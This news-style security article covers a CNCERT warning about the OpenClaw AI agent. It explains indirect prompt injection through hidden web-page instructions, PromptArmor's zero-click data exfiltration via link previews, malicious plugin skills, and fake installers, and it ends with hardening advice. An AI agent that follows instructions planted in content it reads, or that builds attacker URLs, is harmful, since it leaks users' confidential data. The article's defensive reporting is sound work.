OpenClaw Has a Security Problem & Attackers Figured It Out First
AI agents are supposed to work for you. Browse the web, summarize content, run tasks autonomously. That’s the pitch. But a new warning from China’s top cybersecurity authority has put one of the most popular AI agent platforms (OpenClaw) squarely in the crosshairs.
What Happened?
On March 14, 2026, China’s National Computer Network Emergency Response Technical Team (CNCERT) issued a public warning about serious security gaps in OpenClaw, an open-source, self-hosted AI agent formerly known as Clawdbot and Moltbot.
The core problem: OpenClaw ships with weak default security settings, but it also runs with deep, privileged access to your system. That combination is a bad one.
The most pressing risk is prompt injection — specifically, indirect prompt injection. Here’s how it works: an attacker embeds hidden instructions inside a web page. When the AI agent is told to browse or summarize that page, it reads the malicious instructions as legitimate commands. From there, it can be manipulated into leaking sensitive information without the user ever knowing.
Researchers at PromptArmor demonstrated this with a particularly nasty variation. In messaging apps like Telegram or Discord, OpenClaw can be tricked into generating a URL controlled by an attacker. When that URL renders as a link preview, the app automatically sends confidential data to the attacker’s server — no click required. The data leaves before the user sees anything.
Beyond prompt injection, CNCERT flagged three more risks: the agent can irreversibly delete data by misreading user instructions; attackers have uploaded 341 malicious “skills” to ClawHub (OpenClaw’s plugin repository) that run arbitrary commands or drop malware; and existing known vulnerabilities in OpenClaw have been actively used to compromise systems.
Meanwhile, threat actors have set up fake GitHub repositories disguised as OpenClaw installers to push information stealers like Atomic and Vidar, along with a proxy malware called GhostSocks. One of these malicious repos made it to the top of Bing’s AI-powered search results for “OpenClaw Windows.”
What’s the Impact?
The stakes depend on who’s using it. For individual users, the risk is personal data exposure. For enterprises, it’s much worse. CNCERT specifically called out finance and energy sectors, warning that a successful attack could expose trade secrets, internal code, and core business data — or take entire systems offline.
The situation has moved beyond theoretical. Chinese authorities have already moved to ban state-run enterprises, government agencies, and military-affiliated families from running OpenClaw on work computers, according to Bloomberg. That’s not a precautionary measure — it’s a response to active risk.
OpenAI also weighed in this week, noting that prompt injection attacks are now incorporating social engineering elements, making them harder to detect and block.
How to Avoid This
If you’re running OpenClaw, the steps below aren’t optional anymore:
Don’t expose OpenClaw’s default management port to the public internet. Isolate the service inside a container. Don’t store credentials in plaintext anywhere the agent can access. Only install skills from sources you’ve verified yourself — and turn off automatic skill updates. Keep the agent itself up to date with the latest patches.
More broadly, treat any AI agent that has web access and system privileges as a potential attack surface. The more autonomy you give it, the more damage a compromised instruction can do. That’s not a reason to avoid AI agents — it’s a reason to configure them properly from the start.
